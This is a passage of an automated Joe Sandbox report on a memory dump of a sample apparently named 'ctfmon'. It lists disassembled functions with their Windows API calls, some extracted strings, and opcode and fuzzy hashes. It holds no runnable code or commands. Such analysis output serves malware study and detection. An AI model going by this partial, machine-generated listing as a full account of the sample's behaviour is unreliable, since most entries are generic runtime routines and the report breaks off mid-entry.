FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FF41

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
Instruction ID: aa68c8225dd583959b6512c48fc187da00978e995f8350bfac9d4924fef5e386
Opcode Fuzzy Hash: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
Instruction Fuzzy Hash: 60413632A042126BD731AB64EC44B3B7698EB51714F11053BF801F3BE2DB7C9C4946D8

Function 0041DA90 Relevance: 13.6, APIs: 9, Instructions: 128threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041DA97
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041DAA4
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DAEC
CallNextHookEx.USER32(00000000,?,?,?), ref: 0041DB03
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DB1E
GetWindowLongA.USER32(?,000000F0), ref: 0041DB62
SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 0041DB89
GetParent.USER32(?), ref: 0041DBF1
CallNextHookEx.USER32(?,?,?,?), ref: 0041DC2E

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
String ID:
API String ID: 1151315845-0
Opcode ID: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
Instruction ID: 3545cc89381b001688f13769ec11b2821f14b273c618948fc64cceaa8c3ba814
Opcode Fuzzy Hash: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
Instruction Fuzzy Hash: 9C41DAB5A44310EBD720DF10EC85BEB7764FB59358F14042AFA0593292D778A8CDC7A9

Function 0041D4B0 Relevance: 13.6, APIs: 9, Instructions: 54COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D4B6
GlobalDeleteAtom.KERNEL32(?), ref: 0041D4F2
GlobalDeleteAtom.KERNEL32(?), ref: 0041D50D
GlobalDeleteAtom.KERNEL32(?), ref: 0041D520
GlobalDeleteAtom.KERNEL32(?), ref: 0041D533
GlobalDeleteAtom.KERNEL32(?), ref: 0041D546
GlobalDeleteAtom.KERNEL32(?), ref: 0041D559
GlobalDeleteAtom.KERNEL32(?), ref: 0041D56C
LeaveCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D57D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
String ID:
API String ID: 3843206905-0
Opcode ID: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
Instruction ID: 13cd0210057b9161806c39b4b786d17877643f6b89466e3cfc64d8f8ea033297
Opcode Fuzzy Hash: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
Instruction Fuzzy Hash: 40113DBDC00215B1D7356BA4EC086EA36B5A71A70CF246422E600476F0D7BC58CEDFAC

Function 00416C3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,?,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C7E
GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C98
GetStringTypeA.KERNEL32(?,?,?,?,qhA,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416CCC
MultiByteToWideChar.KERNEL32(?,0053FD89,?,?,00000000,00000000,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416D04
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C

Strings

qhA, xrefs: 00416D64, 00416CBF

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: qhA
API String ID: 3852931651-109923292
Opcode ID: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
Instruction ID: 03fcf75f4968f94f2bb644bc32e47f6b93cad4a4674484b923943e54a38a0d42
Opcode Fuzzy Hash: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
Instruction Fuzzy Hash: 0641AD72A00219AFCF219F94EC86EEF7BB8FB08754F214526F911D2250D338C991DBA5

Function 00410561 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004105CE
GetStdHandle.KERNEL32(000000F4,0042F07C,00000000,00000000,00000000,?), ref: 004106A4
WriteFile.KERNEL32(00000000), ref: 004106AB

Strings

Runtime Error!Program: , xrefs: 00410634
..., xrefs: 00410620
Microsoft Visual C++ Runtime Library, xrefs: 0041067A
<program name unknown>, xrefs: 004105DE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
Instruction ID: c02292fbb0e4d8d3e6b59c55069bed7ebd2c7da6c3cacf8f517a257bbcbb3b0a
Opcode Fuzzy Hash: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
Instruction Fuzzy Hash: 6031D672B00218AEDF20DAA0CD45FDE376DDF85304F90046BF544D6191E6F8AAD58A5D

Function 00406D3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406D42
GetStockObject.GDI32(00000011), ref: 00406D75
GetStockObject.GDI32(0000000D), ref: 00406D80
GetObjectW.GDI32(00406E87,0000005C,?), ref: 00406DAE
GetDeviceCaps.GDI32(?,0000005A), ref: 00406E1D
#253.OLEPRO32(00000020,0042F580,?,?), ref: 00406E49

Strings

, xrefs: 00406DBA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Object$Stock$#253CapsDeviceH_prolog
String ID:
API String ID: 1238440774-3916222277
Opcode ID: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
Instruction ID: ff0ac20cef680e3f131b4560153c210be97b3ea0a685f7a4baa30aa74b484bf8
Opcode Fuzzy Hash: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
Instruction Fuzzy Hash: C2414974E012299ECB10DFA5D9807EDBBB0BF18304F5040BAE555F7281E7785A45CFA8

Function 00405C06 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32(?,?), ref: 00405C1D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C44
GetSystemMetrics.USER32(00000000), ref: 00405C5C
GetSystemMetrics.USER32(00000001), ref: 00405C63
lstrcpyW.KERNEL32(?,DISPLAY), ref: 00405C87

Strings

B, xrefs: 00405C25
DISPLAY, xrefs: 00405C81

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: System$InfoMetrics$MonitorParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1771318095-3316187204
Opcode ID: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
Instruction ID: 930622f50884a770117930609482ab71e3439554aa9ec88adfacdbd60153f98a
Opcode Fuzzy Hash: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
Instruction Fuzzy Hash: D611E031600B20ABEF119F64DC89A9BBBA8EF09B50B044473FC05AE181D3B5D941CFE9

Function 00407CA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407CAA

Part of subcall function 00407A77: CoGetClassObject.OLE32(00000000,?,00000000,0042F6B0,00000003,?,?,?,?,00407CD3,?,00000000,00000003,0042F710,?,?), ref: 00407A97

Part of subcall function 00426B33: __EH_prolog.LIBCMT ref: 00426B38

Part of subcall function 00426C0F: __EH_prolog.LIBCMT ref: 00426C14

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00407E30
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00407E51
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00407E99
GlobalLock.KERNEL32(00000000), ref: 00407EA7
GlobalUnlock.KERNEL32(?), ref: 00407EBF
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00407EE2
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 00407EFE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
Instruction ID: 7a88ba2808e2917381c35da6fa48b70894891fb86309c958b2177dbe66a41b7c
Opcode Fuzzy Hash: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
Instruction Fuzzy Hash: 9BB1F7B0A0020AEFCB14DF64C8849AE7BB9FF48304B50446EF915EB290D775ED55CBA5

Function 00414114 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 00414156
LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000), ref: 00414172
LCMapStringW.KERNEL32(00000000,?,004070FB,00000001,004070FB,004070FB,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 004141BB
WideCharToMultiByte.KERNEL32(00000000,00000220,004070FB,00000001,00000000,00000000,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?), ref: 004141EE
WideCharToMultiByte.KERNEL32(00000220,00000220,?,?,?,?,00000000,00000000), ref: 00414245
LCMapStringA.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00414261
LCMapStringA.KERNEL32(00000000,?,?,?,?,00000000), ref: 004142B7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
Instruction ID: 4b50a8c487744f979af65fd3580d31e16f27d9c7471aa09ca8c7b8346b332458
Opcode Fuzzy Hash: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
Instruction Fuzzy Hash: E8516072A01219FBCF218F95DC45AEF7F75FF49790F104126F914A2260D33988A1DBA9

Function 00420312 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 00420332
lstrcmpW.KERNEL32(00000000,?), ref: 0042033F
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00420351
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00420374
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042037C
GlobalLock.KERNEL32(00000000), ref: 00420389
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00420396
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004203B4

Part of subcall function 00426AAB: GlobalFlags.KERNEL32(?), ref: 00426AB5
Part of subcall function 00426AAB: GlobalUnlock.KERNEL32(?), ref: 00426ACC
Part of subcall function 00426AAB: GlobalFree.KERNEL32(?), ref: 00426AD7

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
Instruction ID: 0b204c46f73b846c4d535605207009b96763e7d5aecbe2a14173c396f1b1e3a3
Opcode Fuzzy Hash: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
Instruction Fuzzy Hash: B811B271600204BFDB219FA6DC85EAF7BBEEB85744F80441FF605C1122DA389D419768

Function 004036E0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 238COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00403744
SetCurrentDirectoryW.KERNEL32(?), ref: 00403758

Part of subcall function 00405FAB: lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
Part of subcall function 00405FAB: FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
Part of subcall function 00405FAB: GetLastError.KERNEL32 ref: 00405FF1
Part of subcall function 00405FAB: SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C

SetCurrentDirectoryW.KERNEL32(?,*.*,00000000), ref: 00403772
SetCurrentDirectoryW.KERNEL32(?,?,*.*,00000000,?), ref: 004039B8

Strings

*.*, xrefs: 0040375B, 004037EB
+*&=^^^^--------FOAFI, xrefs: 004037FA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentDirectory$ErrorLast$FileFindFirstlstrcpy
String ID: *.*$+*&=^^^^--------FOAFI
API String ID: 3265023940-3701103783
Opcode ID: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
Instruction ID: c2ba0176b6e8a51bde1fead6c9d730875980fedec447b924fc6af5e119b7eb36
Opcode Fuzzy Hash: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
Instruction Fuzzy Hash: 5C91B2B16087458FC714EF64D881AAFB7E4FF94304F40492EF88697292DB789A09CB56

Function 0042A3D2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 204stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A3D7
lstrlenA.KERNEL32(?,?,00000000), ref: 0042A402

Part of subcall function 0042A1BB: VariantChangeType.OLEAUT32(?,?,00000000), ref: 0042A25D

VariantClear.OLEAUT32(0000000C), ref: 0042A536

Strings

`DvP?Dv, xrefs: 0042A611

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Variant$ChangeClearH_prologTypelstrlen
String ID: `DvP?Dv
API String ID: 1986235341-2995021381
Opcode ID: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
Instruction ID: abb0e72d5d88a092ec7afbcfa9dfacffd580bca7bb0b75038710df2ecb83c9b3
Opcode Fuzzy Hash: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
Instruction Fuzzy Hash: 2571DF31A00219EBCB10DF95E884AAF7BB4FF04354B94801AFC45AB351D738DD65CB9A

Function 0041F591 Relevance: 10.6, APIs: 7, Instructions: 140COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041F5E3
CallWindowProcA.USER32(00000000), ref: 0041F605

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
Instruction ID: 95218b5de41767b7d9650821bd78bf42db176b432e658d53fc5444424646f800
Opcode Fuzzy Hash: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
Instruction Fuzzy Hash: 263121B66012106BD31097A8AC85DEFB79CDBD6365F04003AF904C3211E339A98B87BA

Function 0041C550 Relevance: 10.6, APIs: 7, Instructions: 109COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?), ref: 0041C56D
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
SetBkColor.GDI32(?,?), ref: 0041C607
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
SetBkColor.GDI32(?,00000000), ref: 0041C674

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Text$Color
String ID:
API String ID: 3751486306-0
Opcode ID: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
Instruction ID: dabda8f32d19d4ae70fa47c5b4f3ddd5b41a6e56053b92537af6c747e390af38
Opcode Fuzzy Hash: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
Instruction Fuzzy Hash: EE415A74244301AFE320DF54CC86F6AB7E4EB85B40F64481DFA549A2C1D775E90ACB6A

Function 0040C2A5 Relevance: 10.6, APIs: 7, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000002), ref: 0040C2C0
GetParent.USER32(?), ref: 0040C2D3

Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000F0), ref: 0040C264
Part of subcall function 0040C24C: GetParent.USER32(?), ref: 0040C27D
Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000EC), ref: 0040C290

GetWindow.USER32(?,00000002), ref: 0040C2F6
GetWindow.USER32(?,00000002), ref: 0040C308
GetWindowLongW.USER32(?,000000EC), ref: 0040C318
IsWindowVisible.USER32(?), ref: 0040C331
GetTopWindow.USER32(?), ref: 0040C357

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
